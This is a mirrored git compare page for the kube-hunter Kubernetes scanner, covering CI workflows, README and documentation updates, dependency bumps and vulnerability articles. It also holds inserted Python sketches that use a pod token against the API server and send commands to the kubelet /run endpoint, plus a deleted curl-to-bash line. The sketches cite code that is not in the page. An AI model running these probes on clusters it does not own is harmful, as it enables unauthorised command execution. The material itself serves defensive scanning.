mirror of https://github.com/aquasecurity/kube-hunter.git
synced 2026-02-14 18:09:56 +00:00

Compare commits: add_plugin ... update-dep
40 Commits
Commit SHA1s:
05bc6ea4f3, cdbc3dc12b, d208b43532, 42250d9f62, d94d86a4c1, a1c2c3ee3e, 6aeee7f49d, f95df8172b,
a3ad928f29, 22d6676e08, b9e0ef30e8, 693d668d0a, 2e4684658f, f5e8b14818, 05094a9415, 8acedf2e7d,
14ca1b8bce, 5a578fd8ab, bf7023d01c, d7168af7d5, 35873baa12, a476d9383f, 6a3c7a885a, b6be309651,
0d5b3d57d3, 69057acf9b, e63200139e, ad4cfe1c11, 24b5a709ad, 9cadc0ee41, 3950a1c2f2, 7530e6fee3,
72ae8c0719, b341124c20, 3e06647b4c, cd1f79a658, 2428e2e869, daf53cb484, d6ca666447, 3ba926454a
.github/PULL_REQUEST_TEMPLATE.md (vendored, 2 changes)
@@ -7,7 +7,7 @@
Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.

## Contribution Guidelines
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).

## Fixed Issues
.github/workflows/lint.yml (new file, vendored, 14 lines)
@@ -0,0 +1,14 @@
---
name: Lint

on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-20.04

    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-python@v2
      - uses: pre-commit/action@v2.0.0
      - uses: ibiqlik/action-yamllint@v3
.github/workflows/publish.yml (new file, vendored, 65 lines)
@@ -0,0 +1,65 @@
---
name: Publish
on:
  push:
    tags:
      - "v*"
env:
  ALIAS: aquasecurity
  REP: kube-hunter
jobs:
  publish:
    name: Publish
    runs-on: ubuntu-18.04
    steps:
      - name: Check Out Repo
        uses: actions/checkout@v2
      - name: Set up QEMU
        uses: docker/setup-qemu-action@v1
      - name: Set up Docker Buildx
        id: buildx
        uses: docker/setup-buildx-action@v1
      - name: Cache Docker layers
        uses: actions/cache@v2
        with:
          path: /tmp/.buildx-cache
          key: ${{ runner.os }}-buildxarch-${{ github.sha }}
          restore-keys: |
            ${{ runner.os }}-buildxarch-
      - name: Login to Docker Hub
        uses: docker/login-action@v1
        with:
          username: ${{ secrets.DOCKERHUB_USER }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
      - name: Login to ECR
        uses: docker/login-action@v1
        with:
          registry: public.ecr.aws
          username: ${{ secrets.ECR_ACCESS_KEY_ID }}
          password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
      - name: Get version
        id: get_version
        uses: crazy-max/ghaction-docker-meta@v1
        with:
          images: ${{ env.REP }}
          tag-semver: |
            {{version}}

      - name: Build and push - Docker/ECR
        id: docker_build
        uses: docker/build-push-action@v2
        with:
          context: .
          platforms: linux/amd64
          builder: ${{ steps.buildx.outputs.name }}
          push: true
          tags: |
            ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
            public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
            ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
            public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
          cache-from: type=local,src=/tmp/.buildx-cache/release
          cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release

      - name: Image digest
        run: echo ${{ steps.docker_build.outputs.digest }}
.github/workflows/release.yml (new file, vendored, 53 lines)
@@ -0,0 +1,53 @@
---
on:
  push:
    # Sequence of patterns matched against refs/tags
    tags:
      - 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10

name: Release

jobs:
  build:
    name: Upload Release Asset
    runs-on: ubuntu-16.04
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.9'

      - name: Install dependencies
        run: |
          python -m pip install -U pip
          python -m pip install -r requirements-dev.txt

      - name: Build project
        shell: bash
        run: |
          make pyinstaller

      - name: Create Release
        id: create_release
        uses: actions/create-release@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          tag_name: ${{ github.ref }}
          release_name: ${{ github.ref }}
          draft: false
          prerelease: false

      - name: Upload Release Asset
        id: upload-release-asset
        uses: actions/upload-release-asset@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          upload_url: ${{ steps.create_release.outputs.upload_url }}
          asset_path: ./dist/kube-hunter
          asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
          asset_content_type: application/octet-stream
.github/workflows/test.yml (new file, vendored, 55 lines)
@@ -0,0 +1,55 @@
---
name: Test

on: [push, pull_request]

env:
  FORCE_COLOR: 1

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      fail-fast: false
      matrix:
        python-version: ["3.6", "3.7", "3.8", "3.9"]
        os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]

    steps:
      - uses: actions/checkout@v2

      - name: Set up Python ${{ matrix.python-version }}
        uses: actions/setup-python@v2
        with:
          python-version: ${{ matrix.python-version }}

      - name: Get pip cache dir
        id: pip-cache
        run: |
          echo "::set-output name=dir::$(pip cache dir)"

      - name: Cache
        uses: actions/cache@v2
        with:
          path: ${{ steps.pip-cache.outputs.dir }}
          key:
            ${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
          restore-keys: |
            ${{ matrix.os }}-${{ matrix.python-version }}-

      - name: Install dependencies
        run: |
          python -m pip install -U pip
          python -m pip install -U wheel
          python -m pip install -r requirements.txt
          python -m pip install -r requirements-dev.txt

      - name: Test
        shell: bash
        run: |
          make test

      - name: Upload coverage
        uses: codecov/codecov-action@v1
        with:
          name: ${{ matrix.os }} Python ${{ matrix.python-version }}
.gitignore (vendored, 1 change)
@@ -24,6 +24,7 @@ var/
*.egg
*.spec
.eggs
pip-wheel-metadata

# Directory Cache Files
.DS_Store
@@ -1,10 +1,11 @@
---
repos:
- repo: https://github.com/psf/black
  rev: stable
  hooks:
    - id: black
- repo: https://gitlab.com/pycqa/flake8
  rev: 3.7.9
  hooks:
    - id: flake8
      additional_dependencies: [flake8-bugbear]
- repo: https://github.com/psf/black
  rev: stable
  hooks:
    - id: black
- repo: https://gitlab.com/pycqa/flake8
  rev: 3.7.9
  hooks:
    - id: flake8
      additional_dependencies: [flake8-bugbear]
.travis.yml (deleted, 20 lines)
@@ -1,20 +0,0 @@
group: travis_latest
language: python
cache: pip
python:
  - "3.6"
  - "3.7"
  - "3.8"
install:
  - pip install -r requirements.txt
  - pip install -r requirements-dev.txt
before_script:
  - make lint-check
script:
  - make test
after_success:
  - bash <(curl -s https://codecov.io/bash)
notifications:
  email:
    on_success: change
    on_failure: always
.yamllint (new file, 6 lines)
@@ -0,0 +1,6 @@
---
extends: default

rules:
  line-length: disable
  truthy: disable
Dockerfile (10 changes)
@@ -16,4 +16,14 @@ RUN make deps
COPY . .
RUN make install

FROM python:3.8-alpine

RUN apk add --no-cache \
    tcpdump \
    ebtables && \
    apk upgrade --no-cache

COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter

ENTRYPOINT ["kube-hunter"]
README.md (26 changes)
@@ -1,12 +1,18 @@



[](https://travis-ci.org/aquasecurity/kube-hunter)
[](https://codecov.io/gh/aquasecurity/kube-hunter)
[![GitHub Release][release-img]][release]
![Downloads][download]
![Docker Pulls][docker-pull]
[](https://github.com/aquasecurity/kube-hunter/actions)
[](https://codecov.io/gh/aquasecurity/kube-hunter)
[](https://github.com/psf/black)
[](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
[](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE)
[](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")

[download]: https://img.shields.io/github/downloads/aquasecurity/kube-hunter/total?logo=github
[release-img]: https://img.shields.io/github/release/aquasecurity/kube-hunter.svg?logo=github
[release]: https://github.com/aquasecurity/kube-hunter/releases
[docker-pull]: https://img.shields.io/docker/pulls/aquasec/kube-hunter?logo=docker&label=docker%20pulls%20%2F%20kube-hunter

kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**

@@ -14,9 +20,9 @@ kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was d

**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/

**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](kube_hunter/CONTRIBUTING.md).
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).

[](https://youtu.be/s2-6rTkH8a8?t=57s)
[](https://youtu.be/s2-6rTkH8a8?t=57s)

Table of Contents
=================
@@ -34,6 +40,7 @@ Table of Contents
* [Prerequisites](#prerequisites)
* [Container](#container)
* [Pod](#pod)
* [Contribution](#contribution)

## Hunting

@@ -174,5 +181,8 @@ The example `job.yaml` file defines a Job that will run kube-hunter in a pod, us
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`

## Contribution
To read the contribution guidelines, <a href="https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md"> Click here </a>

## License
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE).
SECURITY.md (new file, 17 lines)
@@ -0,0 +1,17 @@
# Security Policy

## Supported Versions

| Version | Supported |
| --------- | ------------------ |
| 0.4.x | :white_check_mark: |
| 0.3.x | :white_check_mark: |

## Reporting a Vulnerability

We encourage you to find vulnerabilities in kube-hunter.
The process is simple, just report a Bug issue. and we will take a look at this.
If you prefer to disclose privately, you can write to one of the security maintainers at:

| Name | Email |
| ----------- | ------------------ |
| Daniel Sagi | daniel.sagi@aquasec.com |
@@ -1,11 +1,12 @@
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
activesupport (4.2.11.1)
|
||||
i18n (~> 0.7)
|
||||
activesupport (6.0.3.4)
|
||||
concurrent-ruby (~> 1.0, >= 1.0.2)
|
||||
i18n (>= 0.7, < 2)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
tzinfo (~> 1.1)
|
||||
zeitwerk (~> 2.2, >= 2.2.2)
|
||||
addressable (2.7.0)
|
||||
public_suffix (>= 2.0.2, < 5.0)
|
||||
coffee-script (2.4.1)
|
||||
@@ -15,65 +16,67 @@ GEM
|
||||
colorator (1.1.0)
|
||||
commonmarker (0.17.13)
|
||||
ruby-enum (~> 0.5)
|
||||
concurrent-ruby (1.1.5)
|
||||
dnsruby (1.61.3)
|
||||
addressable (~> 2.5)
|
||||
em-websocket (0.5.1)
|
||||
concurrent-ruby (1.1.7)
|
||||
dnsruby (1.61.5)
|
||||
simpleidn (~> 0.1)
|
||||
em-websocket (0.5.2)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
ethon (0.12.0)
|
||||
ffi (>= 1.3.0)
|
||||
eventmachine (1.2.7)
|
||||
execjs (2.7.0)
|
||||
faraday (0.17.0)
|
||||
faraday (1.3.0)
|
||||
faraday-net_http (~> 1.0)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.11.1)
|
||||
ruby2_keywords
|
||||
faraday-net_http (1.0.1)
|
||||
ffi (1.14.2)
|
||||
forwardable-extended (2.6.0)
|
||||
gemoji (3.0.1)
|
||||
github-pages (201)
|
||||
activesupport (= 4.2.11.1)
|
||||
github-pages (209)
|
||||
github-pages-health-check (= 1.16.1)
|
||||
jekyll (= 3.8.5)
|
||||
jekyll-avatar (= 0.6.0)
|
||||
jekyll (= 3.9.0)
|
||||
jekyll-avatar (= 0.7.0)
|
||||
jekyll-coffeescript (= 1.1.1)
|
||||
jekyll-commonmark-ghpages (= 0.1.6)
|
||||
jekyll-default-layout (= 0.1.4)
|
||||
jekyll-feed (= 0.11.0)
|
||||
jekyll-feed (= 0.15.1)
|
||||
jekyll-gist (= 1.5.0)
|
||||
jekyll-github-metadata (= 2.12.1)
|
||||
jekyll-mentions (= 1.4.1)
|
||||
jekyll-optional-front-matter (= 0.3.0)
|
||||
jekyll-github-metadata (= 2.13.0)
|
||||
jekyll-mentions (= 1.6.0)
|
||||
jekyll-optional-front-matter (= 0.3.2)
|
||||
jekyll-paginate (= 1.1.0)
|
||||
jekyll-readme-index (= 0.2.0)
|
||||
jekyll-redirect-from (= 0.14.0)
|
||||
jekyll-relative-links (= 0.6.0)
|
||||
jekyll-remote-theme (= 0.4.0)
|
||||
jekyll-readme-index (= 0.3.0)
|
||||
jekyll-redirect-from (= 0.16.0)
|
||||
jekyll-relative-links (= 0.6.1)
|
||||
jekyll-remote-theme (= 0.4.2)
|
||||
jekyll-sass-converter (= 1.5.2)
|
||||
jekyll-seo-tag (= 2.5.0)
|
||||
jekyll-sitemap (= 1.2.0)
|
||||
jekyll-swiss (= 0.4.0)
|
||||
jekyll-seo-tag (= 2.6.1)
|
||||
jekyll-sitemap (= 1.4.0)
|
||||
jekyll-swiss (= 1.0.0)
|
||||
jekyll-theme-architect (= 0.1.1)
|
||||
jekyll-theme-cayman (= 0.1.1)
|
||||
jekyll-theme-dinky (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.2)
|
||||
jekyll-theme-leap-day (= 0.1.1)
|
||||
jekyll-theme-merlot (= 0.1.1)
|
||||
jekyll-theme-midnight (= 0.1.1)
|
||||
jekyll-theme-minimal (= 0.1.1)
|
||||
jekyll-theme-modernist (= 0.1.1)
|
||||
jekyll-theme-primer (= 0.5.3)
|
||||
jekyll-theme-primer (= 0.5.4)
|
||||
jekyll-theme-slate (= 0.1.1)
|
||||
jekyll-theme-tactile (= 0.1.1)
|
||||
jekyll-theme-time-machine (= 0.1.1)
|
||||
jekyll-titles-from-headings (= 0.5.1)
|
||||
jemoji (= 0.10.2)
|
||||
kramdown (= 1.17.0)
|
||||
liquid (= 4.0.0)
|
||||
listen (= 3.1.5)
|
||||
jekyll-titles-from-headings (= 0.5.3)
|
||||
jemoji (= 0.12.0)
|
||||
kramdown (= 2.3.0)
|
||||
kramdown-parser-gfm (= 1.1.0)
|
||||
liquid (= 4.0.3)
|
||||
mercenary (~> 0.3)
|
||||
minima (= 2.5.0)
|
||||
minima (= 2.5.1)
|
||||
nokogiri (>= 1.10.4, < 2.0)
|
||||
rouge (= 3.11.0)
|
||||
rouge (= 3.23.0)
|
||||
terminal-table (~> 1.4)
|
||||
github-pages-health-check (1.16.1)
|
||||
addressable (~> 2.3)
|
||||
@@ -81,27 +84,27 @@ GEM
|
||||
octokit (~> 4.0)
|
||||
public_suffix (~> 3.0)
|
||||
typhoeus (~> 1.3)
|
||||
html-pipeline (2.12.0)
|
||||
html-pipeline (2.14.0)
|
||||
activesupport (>= 2)
|
||||
nokogiri (>= 1.4)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.5)
|
||||
jekyll (3.9.0)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
kramdown (>= 1.17, < 3)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-avatar (0.6.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-avatar (0.7.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-coffeescript (1.1.1)
|
||||
coffee-script (~> 2.2)
|
||||
coffee-script-source (~> 1.11.1)
|
||||
@@ -114,36 +117,37 @@ GEM
|
||||
rouge (>= 2.0, < 4.0)
|
||||
jekyll-default-layout (0.1.4)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-feed (0.11.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-feed (0.15.1)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-gist (1.5.0)
|
||||
octokit (~> 4.2)
|
||||
jekyll-github-metadata (2.12.1)
|
||||
jekyll (~> 3.4)
|
||||
jekyll-github-metadata (2.13.0)
|
||||
jekyll (>= 3.4, < 5.0)
|
||||
octokit (~> 4.0, != 4.4.0)
|
||||
jekyll-mentions (1.4.1)
|
||||
jekyll-mentions (1.6.0)
|
||||
html-pipeline (~> 2.3)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-optional-front-matter (0.3.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-optional-front-matter (0.3.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-paginate (1.1.0)
|
||||
jekyll-readme-index (0.2.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-redirect-from (0.14.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-relative-links (0.6.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-remote-theme (0.4.0)
|
||||
jekyll-readme-index (0.3.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-redirect-from (0.16.0)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-relative-links (0.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-remote-theme (0.4.2)
|
||||
addressable (~> 2.0)
|
||||
jekyll (~> 3.5)
|
||||
rubyzip (>= 1.2.1, < 3.0)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
|
||||
rubyzip (>= 1.3.0, < 3.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-seo-tag (2.5.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-sitemap (1.2.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-swiss (0.4.0)
|
||||
jekyll-seo-tag (2.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-sitemap (1.4.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-swiss (1.0.0)
|
||||
jekyll-theme-architect (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
@@ -153,8 +157,8 @@ GEM
|
||||
jekyll-theme-dinky (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-hacker (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-hacker (0.1.2)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-leap-day (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
@@ -171,8 +175,8 @@ GEM
|
||||
jekyll-theme-modernist (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-primer (0.5.3)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-primer (0.5.4)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-github-metadata (~> 2.9)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-slate (0.1.1)
|
||||
@@ -184,43 +188,49 @@ GEM
|
||||
jekyll-theme-time-machine (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-titles-from-headings (0.5.1)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-titles-from-headings (0.5.3)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-watch (2.2.1)
|
||||
listen (~> 3.0)
|
||||
jemoji (0.10.2)
|
||||
jemoji (0.12.0)
|
||||
gemoji (~> 3.0)
|
||||
html-pipeline (~> 2.2)
|
||||
jekyll (~> 3.0)
|
||||
kramdown (1.17.0)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
kramdown (2.3.0)
|
||||
rexml
|
||||
kramdown-parser-gfm (1.1.0)
|
||||
kramdown (~> 2.0)
|
||||
liquid (4.0.3)
|
||||
listen (3.4.0)
|
||||
rb-fsevent (~> 0.10, >= 0.10.3)
|
||||
rb-inotify (~> 0.9, >= 0.9.10)
|
||||
mercenary (0.3.6)
|
||||
mini_portile2 (2.4.0)
|
||||
minima (2.5.0)
|
||||
jekyll (~> 3.5)
|
||||
mini_portile2 (2.5.0)
|
||||
minima (2.5.1)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-feed (~> 0.9)
|
||||
jekyll-seo-tag (~> 2.1)
|
||||
minitest (5.12.2)
|
||||
minitest (5.14.3)
|
||||
multipart-post (2.1.1)
|
||||
nokogiri (1.10.8)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.14.0)
|
||||
nokogiri (1.11.1)
|
||||
mini_portile2 (~> 2.5.0)
|
||||
racc (~> 1.4)
|
||||
octokit (4.20.0)
|
||||
faraday (>= 0.9)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
pathutil (0.16.2)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.1.1)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.10.0)
|
||||
racc (1.5.2)
|
||||
rb-fsevent (0.10.4)
|
||||
rb-inotify (0.10.1)
|
||||
ffi (~> 1.0)
|
||||
rouge (3.11.0)
|
||||
ruby-enum (0.7.2)
|
||||
rexml (3.2.4)
|
||||
rouge (3.23.0)
|
||||
ruby-enum (0.8.0)
|
||||
i18n
|
||||
ruby_dep (1.5.0)
|
||||
rubyzip (2.0.0)
|
||||
ruby2_keywords (0.0.2)
|
||||
rubyzip (2.3.0)
|
||||
safe_yaml (1.0.5)
|
||||
sass (3.7.4)
|
||||
sass-listen (~> 4.0.0)
|
||||
@@ -230,14 +240,20 @@ GEM
|
||||
sawyer (0.8.2)
|
||||
addressable (>= 2.3.5)
|
||||
faraday (> 0.8, < 2.0)
|
||||
simpleidn (0.1.1)
|
||||
unf (~> 0.1.4)
|
||||
terminal-table (1.8.0)
|
||||
unicode-display_width (~> 1.1, >= 1.1.1)
|
||||
thread_safe (0.3.6)
|
||||
typhoeus (1.3.1)
|
||||
typhoeus (1.4.0)
|
||||
ethon (>= 0.9.0)
|
||||
tzinfo (1.2.5)
|
||||
tzinfo (1.2.9)
|
||||
thread_safe (~> 0.1)
|
||||
unicode-display_width (1.6.0)
|
||||
unf (0.1.4)
|
||||
unf_ext
|
||||
unf_ext (0.0.7.7)
|
||||
unicode-display_width (1.7.0)
|
||||
zeitwerk (2.4.2)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
@@ -247,4 +263,4 @@ DEPENDENCIES
|
||||
jekyll-sitemap
|
||||
|
||||
BUNDLED WITH
|
||||
1.17.2
|
||||
2.2.5
|
||||
|
||||
@@ -1,6 +1,7 @@
---
title: kube-hunter
description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
show_downloads: false
google_analytics: UA-63272154-1
theme: jekyll-theme-minimal
@@ -10,7 +11,7 @@ collections:
defaults:
  -
    scope:
      path: "" # an empty string here means all files in the project
      path: "" # an empty string here means all files in the project
    values:
      layout: "default"
@@ -12,7 +12,7 @@ Kubernetes API was accessed with Pod Service Account or without Authentication (

## Remediation

Secure acess to your Kubernetes API.
Secure access to your Kubernetes API.

It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principal.

@@ -21,4 +21,4 @@ Consider opting out automatic mounting of SA token using `automountServiceAccoun

## References

- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
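For context on the KHV005 remediation above, here is a minimal illustrative sketch of the access pattern it addresses: code running in a pod can read the automatically mounted default service account token and call the API server with it. The token path and Bearer-header usage follow what kube-hunter itself does later in this changeset; the namespace listing call and environment variables are standard in-cluster values, not part of the diff.

```python
# Illustrative sketch only; runs inside a pod with a mounted default service account token.
import os
import requests

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"


def probe_api_with_pod_token(timeout=5):
    # Mounted automatically unless automountServiceAccountToken is disabled on the pod/SA.
    with open(TOKEN_PATH) as f:
        token = f.read()
    host = os.environ["KUBERNETES_SERVICE_HOST"]            # standard in-cluster env var
    port = os.environ.get("KUBERNETES_SERVICE_PORT", "443")
    # Whatever this returns to the default service account is also visible to an attacker in the pod.
    resp = requests.get(
        f"https://{host}:{port}/api/v1/namespaces",
        headers={"Authorization": f"Bearer {token}"},
        verify=False,
        timeout=timeout,
    )
    return resp.status_code
```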
docs/_kb/KHV051.md (new file, 40 lines)
@@ -0,0 +1,40 @@
---
vid: KHV051
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
categories: [Access Risk]
---

# {{ page.vid }} - {{ page.title }}

## Issue description

The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.

A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.

Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.

## Remediation

Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.

Minimize the use of privileged containers.

Use Pod Security Policies to enforce using `privileged: false` policy.

Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.

Ensure node(s) runs active filesystem monitoring.

Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.

Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.

## References

- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
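The KHV051 article above describes anonymous command execution through the secure kubelet port. As an illustration, the sketch below mirrors the `/run/<namespace>/<pod>/<container>?cmd=...` request shape used by kube-hunter's Azure SPN hunter later in this changeset; the host, namespace, pod and container names are placeholders, and this is only an assumed probe, not part of the diff.

```python
# Illustrative sketch; placeholder names, kubelet secure port assumed to be the default 10250.
import requests


def kubelet_allows_anonymous_run(host, namespace, pod, container, cmd="id", timeout=5):
    # Same URL shape as the run_url built in kube_hunter/modules/hunting/aks.py in this changeset.
    run_url = f"https://{host}:10250/run/{namespace}/{pod}/{container}"
    try:
        resp = requests.post(run_url, params={"cmd": cmd}, verify=False, timeout=timeout)
    except requests.RequestException:
        return False
    # With --anonymous-auth=false the kubelet answers 401/403 instead of executing the command.
    return resp.status_code == 200
```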
docs/_kb/KHV052.md (new file, 23 lines)
@@ -0,0 +1,23 @@
---
vid: KHV052
title: Exposed Pods
categories: [Information Disclosure]
---

# {{ page.vid }} - {{ page.title }}

## Issue description

An attacker could view sensitive information about pods that are bound to a Node using the exposed /pods endpoint
This can be done either by accessing the readonly port (default 10255), or from the secure kubelet port (10250)

## Remediation

Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.

Disable the readonly port by using `--read-only-port=0` kubelet flag.

## References

- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
